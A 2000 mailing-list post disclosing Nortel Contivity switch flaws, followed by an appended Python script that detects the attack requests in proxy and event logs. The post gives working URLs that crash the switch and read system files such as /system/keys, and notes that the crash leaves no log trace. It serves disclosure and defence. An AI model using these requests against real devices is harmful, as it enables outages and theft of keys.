Nortel Contivity Extranet Vulnerability!

Chris Carlson carlsonmail at YAHOO.COM
Thu Jan 20 11:35:46 EST 2000


All,

I read this morning about a new vulnerability for the
Contivity extranet switches.  This vulnerability gives
anyone the ability to crash the Contivity from a web
browser.

I tested the file list successfully.  Scary!  Typical
cgi-bin exploits, though.

While I don't believe that this vulnerability leads to
an exploit of the authentication, encryption, or IPSec
modules, it's something to consider.

In the meantime, you can disable unencrypted WEB
management sessions to the switch.  That makes the web
server unavailable to anyone NOT coming in encrypted.
To manage it, you would tunnel to the inside interface
of the switch.  (Of course, if you did this, then you
couldn't manage any Contivities remotely if you tunnel
in, since you can't set up two IPSec tunnels on a PC,
one to get into the network and one for the web
server.)

As of yet there is no fix from Nortel, although 2
calls have been logged by Securityfocus.

Nortel has opened cases for each of these
vulnerabilities:

 CR# 118890 - DoS

 CR# 118887 - cgiproc 'bug'

A fix is planned for the next release of VxWorks.

There are 2 exploits: one that will cause a crash and
one that will allow you to view system files.

http://x.x.x.x/manage/cgi/cgiproc?$

 [crash]

No evidence of this problem being exploited is saved
in the logs.


The second exploit allows any user to view system
files from their web browser.


http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.

(interesting places to look: /system/filelist.dat,
/system/version.dat, /system/keys, /system/core, etc.)

All that is written to the logs when this is exploited
is below:

 09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login

You can read more at
http://www.securityfocus.com/bid/938


Chris
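
Detection logic for the two cgiproc request patterns and the event-log entry quoted in the message above, as an added example that is not part of the original post or any Nortel code. It assumes a proxy or IDS in front of the management interface that records requests in common log format (the post notes the crash itself leaves nothing in the switch logs); the sample addresses, timestamps and the index.html path are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

CGIPROC = "/manage/cgi/cgiproc"
# Event-log message quoted in the post: the only trace the file read leaves.
EVT_RE = re.compile(r"^\s*(\d\d:\d\d:\d\d)\s+tEvtLgMgr\b.*Request for cgiproc denied")
# Client and request target from a common-log-format line (assumed log source).
REQ_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_request(target):
    """Return 'crash', 'file-read' or None for one HTTP request target."""
    parts = urlsplit(target)
    if unquote(parts.path).lower() != CGIPROC:
        return None
    if unquote(parts.query) == "$":  # also catches the encoded form %24
        return "crash"
    keys = {k.lower() for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
    return "file-read" if "nocfile" in keys else None

def scan_proxy_log(lines):
    """List (client, kind, target) for requests matching either pattern."""
    hits = []
    for line in lines:
        m = REQ_RE.match(line)
        kind = classify_request(m.group(2)) if m else None
        if kind:
            hits.append((m.group(1), kind, m.group(2)))
    return hits

def scan_event_log(lines):
    """Return timestamps of 'cgiproc denied' entries in the switch event log."""
    return [m.group(1) for m in map(EVT_RE.match, lines) if m]

# Constructed sample data for the demonstration.
PROXY_LOG = [
    '192.0.2.10 - - [20/Jan/2000:09:44:23 -0500] "GET /manage/cgi/cgiproc?Nocfile=/system/version.dat HTTP/1.0" 200 512',
    '192.0.2.11 - - [20/Jan/2000:09:50:02 -0500] "GET /manage/cgi/cgiproc?$ HTTP/1.0" 502 0',
    '192.0.2.12 - - [20/Jan/2000:10:01:00 -0500] "GET /manage/index.html HTTP/1.0" 200 2048',
]
EVENT_LOG = [
    " 09:44:23 tEvtLgMgr 0 : Security [12] Management: Request for cgiproc denied. requires login",
    " 09:45:01 tEvtLgMgr 0 : Security [12] Management: constructed unrelated entry",
]

if __name__ == "__main__":
    for hit in scan_proxy_log(PROXY_LOG):
        print(hit)
    print(scan_event_log(EVENT_LOG))
```

Correlating the event-log timestamps with the proxy hits ties the "denied" entry to a source address, which the switch log line alone does not record.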